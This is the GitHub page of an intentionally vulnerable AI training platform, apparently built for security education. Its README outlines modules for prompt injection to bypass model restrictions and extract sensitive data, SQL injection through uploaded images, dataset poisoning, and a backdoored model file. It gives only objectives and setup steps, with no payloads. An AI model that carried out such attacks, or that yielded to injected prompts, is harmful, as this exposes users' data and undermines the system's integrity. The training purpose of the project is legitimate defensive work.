Skip to content

In3x0rabl3/ATD

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
assets
assets
 
 
backend
backend
 
 
config
config
 
 
data
data
 
 
templates
templates
 
 
types
types
 
 
README.md
README.md
 
 
main.go
main.go
 
 

Repository files navigation

Attack, Train, Defend

A Modular approach using the openai API to Training myself and others on AI / LLM vulnerabilities.

Be caution where you delpoy this application, it's Vulnerable lol... Go is my best friend

basic

Overview

This project showcases four key modules demonstrating common security vulnerabilities and adversarial attack techniques:

  1. Prompt Injection
  2. Data Leakage
  3. Data Poisoning
  4. Supply Chain Attacks

Each module highlights specific attack vectors and provides opportunities for learning about exploitation and mitigation.

The project runs on a Go-based backend with SSL enabled for secure communication.

Modules

1. Prompt Injection

  • Objective: Exploit an AI model by crafting malicious prompts to manipulate responses and extract sensitive information.
  • Key Features:
    • Enables interaction with the AI using crafted prompts.
    • Demonstrates how adversarial prompts can bypass intended restrictions.

2. Data Leakage

  • Objective: Upload a malicious image containing SQL commands to expose sensitive database details.
  • Key Features:
    • Processes uploaded files without proper validation, leading to SQL injection.
    • Demonstrates the exposure of database structures and potentially sensitive information.

3. Data Poisoning

  • Objective: Corrupt the baseline dataset by injecting malicious data to alter the AI model's behavior.
  • Key Features:
    • Accepts CSV uploads to simulate data poisoning.
    • Shows the impact of poisoned datasets on model predictions and integrity.

4. Supply Chain Attacks

  • Objective: Demonstrate the risks of compromised machine learning models.
  • Key Features:
    • Allows uploading of a backdoored model file (malicious_chatbot.pth).
    • Simulates interaction with the compromised model to highlight adversarial behavior.

Setup Instructions

Prerequisites

  1. Programming Language: Go 1.20+

  2. OPENAI API KEY

  3. Python Requirements (for the Supply Chain module):

    • Python 3.8+
    • Dependencies:
      • torch (install via pip)
    • It's recommended to set up a virtual environment: 
      python3 -m venv venv
source venv/bin/activate
pip install torch

  4. SSL Certificates:

    • Generate cert.pem and key.pem files for SSL: 
      openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem

  5. SQLite:

    • Ensure SQLite is installed for the database.

Steps to Run

  1. Clone the Repository: 
    git clone https://github.com/In3x0rabl3/atd.git
cd atd
go mod init atd
go mod tidy
go run main.go
  2. Enjoy:
https://127.0.0.1:8443

About

Intentionally Vulnerable AI / LLM Platform

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages